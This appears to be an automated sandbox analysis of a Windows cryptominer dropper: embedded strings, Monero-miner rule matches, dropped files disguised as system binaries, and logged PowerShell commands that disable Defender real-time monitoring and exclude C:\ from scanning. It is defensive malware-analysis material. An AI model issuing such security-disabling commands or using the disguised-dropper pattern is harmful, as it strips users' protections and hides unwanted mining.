                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/changelog/
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/installation/
                                  Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/security/
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.co8
Source: Wrap.exe String found in binary or memory: https://github.com/BenDr0id/xmrigCC/
Source: migrate.exe, 0000001A.00000003.1846671612.00000000076C4000.00000004.00000020.00020000.00000000.sdmp, Wrap.exe, 0000002A.00000002.4147802066.00007FF726D2E000.00000002.00000001.01000000.0000000C.sdmp, ApplicationsFrameHost.exe, 00000035.00000000.1907411028.00007FF6A9D02000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: https://github.com/BenDr0id/xmrigCC/D
Source: ApplicationsFrameHost.exe, 00000035.00000000.1906573384.00007FF6A98B3000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: https://github.com/Bendr0id/xmrigCC/blob/master/doc/ALGORITHMS.md)
Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: MSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: MSTask.exe, 0000003E.00000002.4150391984.00000268D1AA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/giampaolo/psutil/issues/875.
Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pyca/cryptography
Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pyca/cryptography/
Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pyca/cryptography/issues
Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
Source: MSTask.exe, 0000003E.00000002.4148600389.00000268D1100000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: MSTask.exe, 0000003E.00000003.1932692997.00000268D0BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: MSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: MSTask.exe, 0000003E.00000002.4147072072.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4147072072.00000268D0B7C000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BFB000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000003.1932692997.00000268D0BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: MSTask.exe, 0000003E.00000002.4151443278.00000268D1E90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/497
Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/
Source: MSTask.exe, 0000003E.00000002.4152185819.00000268D2550000.00000004.00001000.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/get
Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/post
Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4150608257.00000268D1CC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mahler:8092/site-updates.py
Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pypi.org/project/cryptography/
Source: MSTask.exe, 00000038.00000003.1917651946.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
Source: MSTask.exe, 0000003E.00000002.4151999223.00000268D2110000.00000004.00001000.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://requests.readthedocs.io
Source: MSTask.exe, 0000003E.00000002.4150391984.00000268D1AA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/questions/4457745#4457745.
Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: MSTask.exe, 0000003E.00000002.4151313174.00000268D1E10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy
Source: MSTask.exe, 0000003E.00000002.4151313174.00000268D1E10000.00000004.00001000.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4151258677.00000268D1DD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
Source: MSTask.exe, 0000003E.00000002.4151510423.00000268D1EE0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/stable/v2-migration-guide.html
Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://w3c.github.io/html/sec-forms.html#multipart-form-data
Source: MSTask.exe, 00000038.00000003.1917413742.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.apache.org/licenses/
Source: MSTask.exe, 00000038.00000003.1917495670.00000286A4AD1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1917367520.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1917413742.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
Source: MSTask.exe, 00000038.00000003.1925792761.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1916291428.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923662833.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927684001.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1927571223.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923606242.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1928035425.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922486820.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924047205.00000286A4AD0000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1922553492.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915801440.00000286A4ACE000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: MSTask.exe, 00000038.00000003.1923983904.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 0000003E.00000002.4153579722.00007FFDFB339000.00000002.00000001.01000000.0000001C.sdmp String found in binary or memory: https://www.openssl.org/H
Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.python.org

                                  System Summary

Source: 53.0.ApplicationsFrameHost.exe.7ff6a9510000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 53.0.ApplicationsFrameHost.exe.7ff6a9510000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, type: DROPPED Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, type: DROPPED Matched rule: Detects coinmining malware Author: ditekSHen
Source: migrate.exe, 0000001A.00000003.1846671612.000000000778E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_e8473442-b
Source: migrate.exe, 0000001A.00000003.1846671612.000000000778E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_979cdb6e-8
Source: IntelConfigService.exe, 00000027.00000000.1896368978.00007FF7555AB000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_74316cc1-8
Source: IntelConfigService.exe, 00000027.00000000.1896368978.00007FF7555AB000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_3c8080b6-e
Source: Superfetch.exe, 00000037.00000000.1912951028.00007FF6384CB000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_f10eebb4-1
Source: Superfetch.exe, 00000037.00000000.1912951028.00007FF6384CB000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_f6fc4573-6
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -ExclusionPath c:\
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\fwJLoWFGhpY.bat" "
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe Code function: 0_2_00876FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\Windows\Tasks\Wmiic.exe Code function: 31_2_00000001400133A0: _snwprintf_s,CreateServiceW,GetLastError,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle
Source: C:\ProgramData\migrate.exe File created: C:\Windows\Tasks\WinRing0x64.sys
Source: C:\ProgramData\migrate.exe File created: C:\Windows\Tasks\__tmp_rar_sfx_access_check_4323765
Source: C:\ProgramData\migrate.exe File created: C:\Windows\Tasks\ApplicationsFrameHost.exe
Source: C:\ProgramData\migrate.exe File created: C:\Windows\Tasks\config.json
Source: C:\ProgramData\migrate.exe File created: C:\Windows\Tasks\IntelConfigService.exe
Source: C:\ProgramData\migrate.exe File created: C:\Windows\Tasks\MSTask.exe
Source: C:\ProgramData\migrate.exe File created: C:\Windows\Tasks\run.bat
Source: C:\ProgramData\migrate.exe File created: C:\Windows\Tasks\Superfetch.exe
Source: C:\ProgramData\migrate.exe File created: C:\Windows\Tasks\WinRing0x64.sys
Source: C:\ProgramData\migrate.exe File created: C:\Windows\Tasks\Wmiic.exe
Source: C:\ProgramData\migrate.exe File created: C:\Windows\Tasks\Wrap.exe
Source: C:\ProgramData\migrate.exe File created: C:\Windows\Tasks\MicrosoftPrt.exe
Source: C:\ProgramData\migrate.exe File created: C:\Windows\Tasks\1.exe
Source: C:\Windows\Tasks\1.exe File created: C:\Windows\__tmp_rar_sfx_access_check_4332265
Source: C:\Windows\Tasks\1.exe File created: C:\Windows\Bridgeprovider.exe
Source: C:\Windows\Tasks\1.exe File created: C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe
Source: C:\Windows\Tasks\1.exe File created: C:\Windows\fwJLoWFGhpY.bat
Source: C:\Windows\Bridgeprovider.exe File created: C:\windows\inf\MicrosoftDefenger.exe
Source: C:\Windows\Bridgeprovider.exe File created: C:\windows\inf\7da2ce7d90598e
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\CSCD2E84F4C387140E5AF80638E7ED67168.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\ProgramData\migrate.exe File deleted: C:\Windows\Tasks\__tmp_rar_sfx_access_check_4323765
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DB20D456_2_00007FF7B1DB20D4
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DB67DC56_2_00007FF7B1DB67DC
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA17A456_2_00007FF7B1DA17A4
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA0F8456_2_00007FF7B1DA0F84
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DB6F6056_2_00007FF7B1DB6F60
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA7F5C56_2_00007FF7B1DA7F5C
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DAE77056_2_00007FF7B1DAE770
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003E848E60_2_003E848E
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003F00B760_2_003F00B7
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003F408860_2_003F4088
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003E40FE60_2_003E40FE
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003F715360_2_003F7153
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_004051C960_2_004051C9
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003E32F760_2_003E32F7
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003F62CA60_2_003F62CA
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003F43BF60_2_003F43BF
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_0040D44060_2_0040D440
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003EC42660_2_003EC426
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003EF46160_2_003EF461
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003F77EF60_2_003F77EF
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003E286B60_2_003E286B
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_0040D8EE60_2_0040D8EE
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003EE9B760_2_003EE9B7
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_004119F460_2_004119F4
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003F6CDC60_2_003F6CDC
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003F3E0B60_2_003F3E0B
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_00404F9A60_2_00404F9A
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003EEFE260_2_003EEFE2
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB233B8062_2_00007FFDFB233B80
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB13FB7062_2_00007FFDFB13FB70
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0012C162_2_00007FFDFB0012C1
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00402562_2_00007FFDFB004025
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB19BA7062_2_00007FFDFB19BA70
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB06FB0062_2_00007FFDFB06FB00
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00385F62_2_00007FFDFB00385F
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB003C1A62_2_00007FFDFB003C1A
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB004B2462_2_00007FFDFB004B24
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00250462_2_00007FFDFB002504
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002BC662_2_00007FFDFB002BC6
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00513C62_2_00007FFDFB00513C
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB1AFF8062_2_00007FFDFB1AFF80
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB12BFA062_2_00007FFDFB12BFA0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB197E7062_2_00007FFDFB197E70
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00719462_2_00007FFDFB007194
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00135C62_2_00007FFDFB00135C
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB01BF2062_2_00007FFDFB01BF20
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB01BD6062_2_00007FFDFB01BD60
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00200E62_2_00007FFDFB00200E
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001B9562_2_00007FFDFB001B95
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0048CC62_2_00007FFDFB0048CC
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002A2762_2_00007FFDFB002A27
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB01F20062_2_00007FFDFB01F200
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB004B7462_2_00007FFDFB004B74
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00251362_2_00007FFDFB002513
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00522762_2_00007FFDFB005227
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB01F06062_2_00007FFDFB01F060
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB003EB362_2_00007FFDFB003EB3
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00188962_2_00007FFDFB001889
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001B7262_2_00007FFDFB001B72
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00282E62_2_00007FFDFB00282E
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0011DB62_2_00007FFDFB0011DB
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB02B85062_2_00007FFDFB02B850
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB003DBE62_2_00007FFDFB003DBE
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00465162_2_00007FFDFB004651
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB12B60062_2_00007FFDFB12B600
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB02B4C062_2_00007FFDFB02B4C0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB1974F062_2_00007FFDFB1974F0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB005B9162_2_00007FFDFB005B91
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00671762_2_00007FFDFB006717
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0060D762_2_00007FFDFB0060D7
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB003EA462_2_00007FFDFB003EA4
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0012A862_2_00007FFDFB0012A8
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00520462_2_00007FFDFB005204
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0069F662_2_00007FFDFB0069F6
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001AE162_2_00007FFDFB001AE1
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001EB062_2_00007FFDFB001EB0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0EA87062_2_00007FFDFB0EA870
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00105F62_2_00007FFDFB00105F
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00659662_2_00007FFDFB006596
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB19A91062_2_00007FFDFB19A910
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001F7362_2_00007FFDFB001F73
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00211262_2_00007FFDFB002112
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0051D762_2_00007FFDFB0051D7
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00267162_2_00007FFDFB002671
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB12EE8062_2_00007FFDFB12EE80
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB01EF0062_2_00007FFDFB01EF00
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0060DC62_2_00007FFDFB0060DC
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0034AE62_2_00007FFDFB0034AE
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB13EDB062_2_00007FFDFB13EDB0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001BC762_2_00007FFDFB001BC7
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0024AA62_2_00007FFDFB0024AA
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0E241062_2_00007FFDFB0E2410
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00691562_2_00007FFDFB006915
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB004DA462_2_00007FFDFB004DA4
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002D6062_2_00007FFDFB002D60
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00309962_2_00007FFDFB003099
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00442162_2_00007FFDFB004421
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0019D862_2_00007FFDFB0019D8
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00600062_2_00007FFDFB006000
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00258B62_2_00007FFDFB00258B
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB13671062_2_00007FFDFB136710
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00412962_2_00007FFDFB004129
